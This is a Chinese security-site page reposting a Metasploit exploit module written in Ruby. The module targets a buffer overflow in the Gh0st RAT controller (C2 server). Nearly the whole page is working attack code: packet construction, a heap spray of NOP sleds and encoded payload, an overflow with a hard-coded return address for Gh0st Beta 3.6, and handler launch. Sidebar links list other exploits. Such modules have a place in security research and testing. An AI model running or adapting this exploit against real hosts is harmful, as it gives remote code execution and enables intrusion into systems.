首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Gh0st Client - Buffer Overflow (Metasploit)
来源:metasploit.com 作者:Professor 发布时间:2017-09-08  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'zlib'
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::Tcp
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Gh0st Client buffer Overflow',
      'Description'    => %q{
          This module exploits a Memory buffer overflow in the Gh0st client (C2 server)
      },
      'Author'         => 'Professor Plum',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'AllowWin32SEH' => true
        },
      'Payload'        =>
        {
          'Space'    => 1000,
          'BadChars' => '',
          'EncoderType' => Msf::Encoder::Type::AlphanumMixed
        },
      'Platform'       => 'win',
      'DisclosureDate' => 'Jul 27 2017',
      'Targets'        =>
        [
          ['Gh0st Beta 3.6', { 'Ret' => 0x06001010 }]
        ],
      'Privileged'     => false,
      'DefaultTarget' => 0))
 
    register_options(
      [
        OptString.new('MAGIC', [true, 'The 5 char magic used by the server', 'Gh0st']),
        Opt::RPORT(80)
      ]
    )
  end
 
  def make_packet(id, data)
    msg = id.chr + data
    compressed = Zlib::Deflate.deflate(msg)
    datastore['MAGIC'] + [13 + compressed.size].pack('V') + [msg.size].pack('V') + compressed
  end
 
  def validate_response(data)
    if data.nil?
      print_status('Server closed connection')
      return false
    end
    if data.empty?
      print_status('No response recieved')
      return false
    end
    if data.size < 13
      print_status('Invalid packet')
      print_status(data)
      return false
    end
    mag, pktlen, msglen = data[0..13].unpack('a' + datastore['MAGIC'].size.to_s + 'VV')
    if mag.index(datastore['MAGIC']) != 0
      print_status('Bad magic: ' + mag[0..datastore['MAGIC'].size])
      return false
    end
    if pktlen != data.size
      print_status('Packet size mismatch')
      return false
    end
    msg = Zlib::Inflate.inflate(data[13..data.size])
    if msg.size != msglen
      print_status('Packet decompress failure')
      return false
    end
    return true
  end
 
  def check
    connect
    sock.put(make_packet(101, "\x00")) # heartbeat
    if validate_response(sock.get_once || '')
      return Exploit::CheckCode::Appears
    end
    Exploit::CheckCode::Safe
  end
 
  def exploit
    print_status("Trying target #{target.name}")
    print_status('Spraying heap...')
    for i in 0..100
      connect
      sock.put(make_packet(101, "\x90" * 3 + "\x90\x83\xc0\x05" * 1024 * 1024 + payload.encoded))
      if not validate_response(sock.get_once)
        disconnect
        return
      end
    end
 
    for i in 103..107
      print_status("Trying command #{i}...")
      begin
        connect
        sploit = make_packet(i, "\0" * 1064 + [target['Ret'] - 0xA0].pack('V') + 'a' * 28)
        sock.put(sploit)
        if validate_response(sock.get_once)
          next
        end
        sleep(0.1)
        break
      rescue EOFError
        print_status('Invalid')
      end
    end
    handler
    disconnect
  end
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apache Struts 2.5 < 2.5.12 - R
·PlugX Controller Stack Overflo
·Tor - Linux Sandbox Breakout v
·Apache Struts 2 REST Plugin XS
·Jungo DriverWizard WinDriver -
·D-Link 850L XSS / Backdoor / C
·Jungo DriverWizard WinDriver -
·Docker Daemon Unprotected TCP
·Mongoose Web Server 6.5 - Cros
·MobaXtrem 10.4 Remote Code Exe
·NEC EXPRESS CLUSTER clpwebmc R
·tcprewrite 3.4.4 Buffer Overfl
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved